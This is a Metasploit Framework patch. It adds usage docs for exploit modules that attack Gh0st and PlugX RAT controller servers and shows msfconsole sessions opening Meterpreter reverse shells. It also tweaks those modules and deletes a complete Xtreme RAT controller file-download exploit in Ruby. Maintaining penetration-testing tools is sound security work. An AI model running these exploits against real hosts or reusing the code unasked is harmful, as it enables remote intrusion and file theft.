From d05c401866c811e0508d8a3ebdb18b89872a4fd5 Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Mon, 4 Sep 2017 20:57:23 -0400
Subject: [PATCH] modules cleanup and add docs

---
 .../modules/exploit/windows/misc/gh0st.md     |  42 ++++++
 .../modules/exploit/windows/misc/plugx.md     |  42 ++++++
 modules/exploits/windows/misc/gh0st.rb        |   3 +-
 modules/exploits/windows/misc/plugx.rb        |   2 +-
 modules/exploits/windows/misc/xtreme.rb       | 124 ------------------
 5 files changed, 86 insertions(+), 127 deletions(-)
 create mode 100644 documentation/modules/exploit/windows/misc/gh0st.md
 create mode 100644 documentation/modules/exploit/windows/misc/plugx.md
 delete mode 100644 modules/exploits/windows/misc/xtreme.rb

diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md
new file mode 100644
index 0000000000..5ae7c251e4
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/gh0st.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
+  This vulnerability can allow remote code execution in the context of the user who ran it.
+  
+  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
+
+## Verification Steps
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/gh0st`
+  4. Do: `set rhost [ip]`
+  5. Do: `exploit`
+  6. Get a shell
+
+## Options
+
+  **MAGIC**
+  
+  This is the 5 character magic used by the server.  The default is `Gh0st`
+
+## Scenarios
+
+### Windows XP SP3 with gh0st 3.6
+
+```
+msf > use exploit/windows/misc/gh0st 
+msf exploit(gh0st) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf exploit(gh0st) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.4:4444 
+[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
+[*] 1.2.3.1.108:80 - Spraying heap...
+[*] 1.2.3.1:80 - Trying command 103...
+[*] Sending stage (956991 bytes) to 1.2.3.1
+[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
+[*] 1.2.3.1:80 - Server closed connection
+
+meterpreter >
+```
diff --git a/documentation/modules/exploit/windows/misc/plugx.md b/documentation/modules/exploit/windows/misc/plugx.md
new file mode 100644
index 0000000000..63640995f3
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/plugx.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
+  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
+  
+  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
+
+## Verification
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/plugx`
+  4. Do: `set rhost [ip]`
+  5. Do: `set target [target]`
+  6. Do: `exploit`
+  7. Click OK for the "PeDecodePacket" pop-up on the target
+  8. Get a shell
+
+## Scenarios
+
+### Windows XP SP3 with PlugX type 1
+
+```
+msf > use exploit/windows/misc/plugx 
+msf exploit(plugx) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(plugx) > set target 1
+target => 1
+msf exploit(plugx) > set verbose true
+verbose => true
+msf exploit(plugx) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.99:4444 
+[*] 1.2.3.4:13579 - Trying target PlugX Type I...
+[*] 1.2.3.4:13579 - waiting for response
+[*] Sending stage (956991 bytes) to 1.2.3.4
+[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
+[*] 1.2.3.4:13579 - Server closed connection
+
+meterpreter > getuid
+Server username: WINXP\user
+```
diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb
index 1c5e29d52a..f4a8ff1734 100644
--- a/modules/exploits/windows/misc/gh0st.rb
+++ b/modules/exploits/windows/misc/gh0st.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
+        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
         Opt::RPORT(80)
       ]
     )
@@ -82,7 +82,6 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('Packet decompress failure')
       return false
     end
-    # print_status(msg.ord.to_s)
     return true
   end
 
diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb
index c21c7c93e8..200f732c57 100644
--- a/modules/exploits/windows/misc/plugx.rb
+++ b/modules/exploits/windows/misc/plugx.rb
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     sock.put(pkt)
 
-    print_status('waiting for response')
+    print_status('Waiting for response')
     validate_response(sock.get_once)
     disconnect
 
diff --git a/modules/exploits/windows/misc/xtreme.rb b/modules/exploits/windows/misc/xtreme.rb
deleted file mode 100644
index edae9318a0..0000000000
--- a/modules/exploits/windows/misc/xtreme.rb
+++ /dev/null
@@ -1,124 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'zlib'
-
-class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
-  include Msf::Exploit::Remote::Tcp
-  include Msf::Auxiliary::Report
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Xtreme Rat Controller Remote File Download Exploit',
-      'Description'    => %q{
-          This module exploits an arbitrary file download vulnerability in the Xtreme C&C server
-      },
-      'Author'         => 'Professor Plum',
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-        ],
-      'Platform'       => 'win',
-      'DisclosureDate' => 'Jul 27 2017',
-      'Targets'        =>
-        [
-          ['Xtreme RAT 3.6', { 'Ver' => '3.6' }],
-          ['Xtreme RAT 3.7', { 'Ver' => '3.7' }]
-        ],
-      'Privileged'     => false,
-      'DefaultTarget' => 1))
-
-    register_options(
-      [
-        Opt::RPORT(80),
-        OptString.new('TARGETFILE', [true, 'Target file to download', 'user.info'])
-      ]
-    )
-  end
-
-  @delm = "\xc2\x00\xaa\x00\xc2\x00\xaa\x00\xc2\x00\xaa\x00#\x00#\x00#\x00\xe2\x00\" a\x01\xe2\x00\" a\x01\xe2\x00\" a\x01".force_encoding('utf-16le')
-  @password = ''
-  @conid = ''
-
-  def validate(b)
-    if b != "X\r\n"
-      print_status(b.inspect)
-      return false
-    end
-    true
-  end
-
-  def check
-    connect
-    sock.put("myversion|#{target['Ver']}\r\n")
-    if validate(sock.recv(3))
-      return Exploit::CheckCode::Appears
-    end
-    Exploit::CheckCode::Safe
-  end
-
-  def make_string(cmd, msg)
-    pp = (cmd + @delm + msg)
-    pack = Zlib::Deflate.deflate(pp)
-    return @password + [pack.size, 0].pack('<II') + pack
-  end
-
-  def read_string(sock)
-    d = sock.recv(16)
-    if d.size < 16
-      print_status("Didn't receive full packet!")
-      return
-    end
-    @password = d[0..7]
-    size = d[8..12].unpack('<I')[0]
-    d = ''
-    while d.size < size
-      d += sock.get_once(size - d.size)
-    end
-    if d.size != size
-      print_status("Bad response! #{d.size} != #{size}")
-      return
-    end
-    msg = Zlib::Inflate.inflate(d).force_encoding('utf-16le')
-    cmd, data = msg.split(@delm)
-    # print_status("#{cmd.inspect} | #{data.inspect}")
-    if 'maininfo'.encode('utf-16le') == cmd
-      @conid = data
-    end
-    if 'updateserverlocal'.encode('utf-16le') == cmd
-      fsize = data.encode('binary').to_i
-      fdata = ''
-      while fdata.size < fsize
-        fdata += sock.get_once(fsize - fdata.size)
-      end
-      print_status("Received file #{datastore['TARGETFILE']}!")
-      # print_status(fdata.inspect)
-      path = store_loot('xtremeRat.file', 'text/plain', datastore['RHOST'], fdata, datastore['TARGETFILE'], 'File retrieved from Xtreme C2 server')
-      print_good("File saved in: #{path}")
-    end
-  end
-
-  def exploit
-    print_status("Trying target #{target.name}...")
-
-    connect
-    sock.put("myversion|#{target['Ver']}\r\n")
-    unless validate(sock.get_once(3))
-      print_status('Server did not Ack hello')
-      return
-    end
-    read_string(sock)
-
-    print_status('Sending request')
-    sock.put(make_string('newconnection|'.encode('utf-16le') + @conid + @delm + 'updateserverlocal'.encode('utf-16le'), datastore['TARGETFILE'].encode('utf-16le')))
-    unless validate(sock.get_once(3))
-      print_status('Server did not Ack message')
-      return
-    end
-    read_string(sock)
-    disconnect
-  end
-end